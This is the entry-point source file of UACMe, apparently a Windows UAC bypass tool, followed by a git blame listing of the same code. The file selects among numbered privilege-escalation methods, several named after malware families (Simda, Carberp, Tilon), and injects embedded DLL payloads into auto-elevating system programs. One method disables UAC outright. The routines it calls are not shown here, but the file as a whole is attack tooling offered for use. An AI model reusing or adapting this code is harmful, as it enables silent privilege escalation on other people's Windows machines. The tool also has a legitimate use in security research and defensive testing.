UACME/Source/Akagi/main.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2015
*
*  TITLE:       MAIN.C
*
*  VERSION:     1.60
*
*  DATE:        20 Apr 2015
*
*  Injector entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

#ifdef _WIN64
#include "hibiki64.h"
#include "fubuki64.h"
#define INJECTDLL Fubuki64
#define AVRFDLL	Hibiki64
#else
#include "hibiki32.h"
#include "fubuki32.h"
#define INJECTDLL Fubuki32
#define AVRFDLL Hibiki32
#endif

#define PROGRAMTITLE TEXT("UACMe")
#define WOW64STRING TEXT("Apparently it seems you are running under WOW64.\n\r\
This is not supported, run x64 version of this tool.")
#define WINPREBLUE TEXT("This method is only for pre Windows 8.1 use")
#define WINBLUEONLY TEXT("This method is only for Windows 8.1 use")
#define WOW64WIN32ONLY TEXT("This method only works from x86-32 Windows or Wow64")

/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
	BOOL					IsWow64 = FALSE;
	DWORD					bytesIO, dwType;
	WCHAR					*p;
	WCHAR					szBuffer[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE	ElevType;
	RTL_OSVERSIONINFOW		osver;

	//verify system version
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	RtlGetVersion(&osver);

	if (osver.dwBuildNumber < 7000) {

		MessageBox(GetDesktopWindow(),
			TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);

		goto Done;
	}

	ElevType = TokenElevationTypeDefault;
	if (!supGetElevationType(&ElevType)) {
		goto Done;
	}
	if (ElevType != TokenElevationTypeLimited) {
		MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	IsWow64 = supIsProcess32bit(GetCurrentProcess());

	dwType = 0;
	bytesIO = 0;
	RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
	if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {

		dwType = strtoul(szBuffer);
		switch (dwType) {

		case METHOD_SYSPREP:
			OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
			if (osver.dwBuildNumber > 9200) {
				MessageBox(GetDesktopWindow(), WINPREBLUE,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_SYSPREP_EX:
			OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
			if (osver.dwBuildNumber < 9600) {
				MessageBox(GetDesktopWindow(), WINBLUEONLY,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_OOBE:
			OutputDebugString(TEXT("[UCM] Oobe\n\r"));
			break;

		case METHOD_APPCOMPAT:
			OutputDebugString(TEXT("[UCM] AppCompat\n\r"));

#ifdef _WIN64
			MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
				PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
#endif
			break;

		case METHOD_SIMDA:
			OutputDebugString(TEXT("[UCM] Simda\n\r"));
			break;

		case METHOD_CARBERP:
			OutputDebugString(TEXT("[UCM] Carberp\n\r"));
			break;

		case METHOD_CARBERP_EX:
			OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
			break;

		case METHOD_TILON:
			OutputDebugString(TEXT("[UCM] Tilon\n\r"));
			if (osver.dwBuildNumber > 9200) {
				MessageBox(GetDesktopWindow(), WINPREBLUE,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_AVRF:
			OutputDebugString(TEXT("[UCM] AVrf\n\r"));
			break;

		case METHOD_WINSAT:
			OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
			break;

		}
	}


	switch (dwType) {

	case METHOD_SYSPREP:
	case METHOD_SYSPREP_EX:
	case METHOD_OOBE:
	case METHOD_TILON:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

//
//  There is no RedirectEXE for x64.
//
#ifndef _WIN64
	case METHOD_APPCOMPAT:
		if (ucmAppcompatElevation()) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif
	case METHOD_SIMDA:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;

	case METHOD_CARBERP:
	case METHOD_CARBERP_EX:

		if (dwType == METHOD_CARBERP) {

			if (osver.dwBuildNumber > 9600) {
				MessageBox(GetDesktopWindow(),
					TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}

			//there is no migmiz in syswow64 in 8+
			if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
				MessageBox(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
		}

		if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
			if (IsWow64) {
				MessageBox(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
#endif
		}


		if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;

	case METHOD_AVRF:
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (ucmAvrfMethod(AVRFDLL, sizeof(AVRFDLL))) {
			OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
		}	
		break;

	case METHOD_WINSAT:
		//
		// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
		//
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}

		if (osver.dwBuildNumber < 9200) {
			p = L"powrprof.dll";
		}
		else {
			p = L"devobj.dll";
		}

		if (ucmWinSATMethod(p, INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
		}
		break;
	}

Done:
	ExitProcess(0);
}
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`/*******************************************************************************`
			`*`
			`* (C) COPYRIGHT AUTHORS, 2014 - 2015`
			`*`
			`* TITLE: MAIN.C`
			`*`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`* VERSION: 1.60`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`* DATE: 20 Apr 2015`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
			`* Injector entry point.`
			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`

			`#include "global.h"`

v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`#ifdef _WIN64`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`#include "hibiki64.h"`
			`#include "fubuki64.h"`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`#define INJECTDLL Fubuki64`
			`#define AVRFDLL Hibiki64`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`#else`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`#include "hibiki32.h"`
			`#include "fubuki32.h"`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`#define INJECTDLL Fubuki32`
			`#define AVRFDLL Hibiki32`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`#endif`

Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`#define PROGRAMTITLE TEXT("UACMe")`
			`#define WOW64STRING TEXT("Apparently it seems you are running under WOW64.\n\r\`
			`This is not supported, run x64 version of this tool.")`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`#define WINPREBLUE TEXT("This method is only for pre Windows 8.1 use")`
			`#define WINBLUEONLY TEXT("This method is only for Windows 8.1 use")`
			`#define WOW64WIN32ONLY TEXT("This method only works from x86-32 Windows or Wow64")`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00
			`/*`
			`* main`
			`*`
			`* Purpose:`
			`*`
			`* Program entry point.`
			`*`
			`*/`
			`VOID main()`
			`{`
			`BOOL IsWow64 = FALSE;`
			`DWORD bytesIO, dwType;`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`WCHAR *p;`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`WCHAR szBuffer[MAX_PATH + 1];`
			`TOKEN_ELEVATION_TYPE ElevType;`
			`RTL_OSVERSIONINFOW osver;`

			`//verify system version`
			`RtlSecureZeroMemory(&osver, sizeof(osver));`
			`osver.dwOSVersionInfoSize = sizeof(osver);`
			`RtlGetVersion(&osver);`

			`if (osver.dwBuildNumber < 7000) {`

			`MessageBox(GetDesktopWindow(),`
			`TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);`

			`goto Done;`
			`}`

			`ElevType = TokenElevationTypeDefault;`
			`if (!supGetElevationType(&ElevType)) {`
			`goto Done;`
			`}`
			`if (ElevType != TokenElevationTypeLimited) {`
			`MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),`
			`PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`

			`IsWow64 = supIsProcess32bit(GetCurrentProcess());`

			`dwType = 0;`
			`bytesIO = 0;`
			`RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));`
			`if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {`
v 1.4.0 Win32/Tilon. 2015-04-04 15:37:21 +00:00
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`dwType = strtoul(szBuffer);`
			`switch (dwType) {`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`case METHOD_SYSPREP:`
			`OutputDebugString(TEXT("[UCM] Sysprep\n\r"));`
			`if (osver.dwBuildNumber > 9200) {`
			`MessageBox(GetDesktopWindow(), WINPREBLUE,`
			`PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`
			`break;`

			`case METHOD_SYSPREP_EX:`
			`OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));`
			`if (osver.dwBuildNumber < 9600) {`
			`MessageBox(GetDesktopWindow(), WINBLUEONLY,`
			`PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`
			`break;`

			`case METHOD_OOBE:`
			`OutputDebugString(TEXT("[UCM] Oobe\n\r"));`
			`break;`

			`case METHOD_APPCOMPAT:`
			`OutputDebugString(TEXT("[UCM] AppCompat\n\r"));`

			`#ifdef _WIN64`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,`
v 1.4.0 Win32/Tilon. 2015-04-04 15:37:21 +00:00			`PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`#endif`
			`break;`

			`case METHOD_SIMDA:`
			`OutputDebugString(TEXT("[UCM] Simda\n\r"));`
			`break;`

			`case METHOD_CARBERP:`
			`OutputDebugString(TEXT("[UCM] Carberp\n\r"));`
			`break;`

			`case METHOD_CARBERP_EX:`
			`OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));`
			`break;`

			`case METHOD_TILON:`
			`OutputDebugString(TEXT("[UCM] Tilon\n\r"));`
			`if (osver.dwBuildNumber > 9200) {`
			`MessageBox(GetDesktopWindow(), WINPREBLUE,`
			`PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`
			`break;`
v 1.4.0 Win32/Tilon. 2015-04-04 15:37:21 +00:00
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`case METHOD_AVRF:`
			`OutputDebugString(TEXT("[UCM] AVrf\n\r"));`
			`break;`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00
			`case METHOD_WINSAT:`
			`OutputDebugString(TEXT("[UCM] WinSAT\n\r"));`
			`break;`

v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`}`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`}`

v 1.4.0 Win32/Tilon. 2015-04-04 15:37:21 +00:00
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`switch (dwType) {`

			`case METHOD_SYSPREP:`
			`case METHOD_SYSPREP_EX:`
			`case METHOD_OOBE:`
v 1.4.0 Win32/Tilon. 2015-04-04 15:37:21 +00:00			`case METHOD_TILON:`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00
			`//`
			`// Since we are using injection and not using heavens gate, we should ban usage under wow64.`
			`//`
			`#ifndef _DEBUG`
			`if (IsWow64) {`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`MessageBox(GetDesktopWindow(),`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`
			`#endif`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));`
			`}`
			`break;`

			`//`
			`// There is no RedirectEXE for x64.`
			`//`
			`#ifndef _WIN64`
			`case METHOD_APPCOMPAT:`
			`if (ucmAppcompatElevation()) {`
			`OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));`
			`}`
			`break;`
			`#endif`
			`case METHOD_SIMDA:`

			`//`
			`// Since we are using injection and not using heavens gate, we should ban usage under wow64.`
			`//`
			`#ifndef _DEBUG`
			`if (IsWow64) {`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`MessageBox(GetDesktopWindow(),`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`
			`#endif`
			`if (MessageBox(GetDesktopWindow(),`
			`TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),`
			`PROGRAMTITLE, MB_ICONQUESTION \| MB_YESNO) == IDYES)`
			`{`
			`if (ucmSimdaTurnOffUac()) {`
			`OutputDebugString(TEXT("[UCM] Simda method called\n\r"));`
			`}`
			`}`
			`break;`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00
			`case METHOD_CARBERP:`
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`case METHOD_CARBERP_EX:`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`if (dwType == METHOD_CARBERP) {`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`if (osver.dwBuildNumber > 9600) {`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`MessageBox(GetDesktopWindow(),`
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`

			`//there is no migmiz in syswow64 in 8+`
			`if ((IsWow64) && (osver.dwBuildNumber > 7601)) {`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`MessageBox(GetDesktopWindow(),`
			`WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`
			`}`

			`if (dwType == METHOD_CARBERP_EX) {`
			`#ifndef _DEBUG`
			`if (IsWow64) {`
			`MessageBox(GetDesktopWindow(),`
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`#endif`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`}`

v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));`
			`}`
			`break;`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00
			`case METHOD_AVRF:`
			`#ifndef _DEBUG`
			`if (IsWow64) {`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`MessageBox(GetDesktopWindow(),`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`
			`#endif`
			`if (ucmAvrfMethod(AVRFDLL, sizeof(AVRFDLL))) {`
			`OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));`
			`}`
			`break;`

v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`case METHOD_WINSAT:`
			`//`
			`// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.`
			`//`
			`if (IsWow64) {`
			`MessageBox(GetDesktopWindow(),`
			`TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);`
			`goto Done;`
			`}`

			`if (osver.dwBuildNumber < 9200) {`
			`p = L"powrprof.dll";`
			`}`
			`else {`
			`p = L"devobj.dll";`
			`}`

			`if (ucmWinSATMethod(p, INJECTDLL, sizeof(INJECTDLL))) {`
			`OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));`
			`}`
			`break;`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`}`

			`Done:`
			`ExitProcess(0);`
			`}`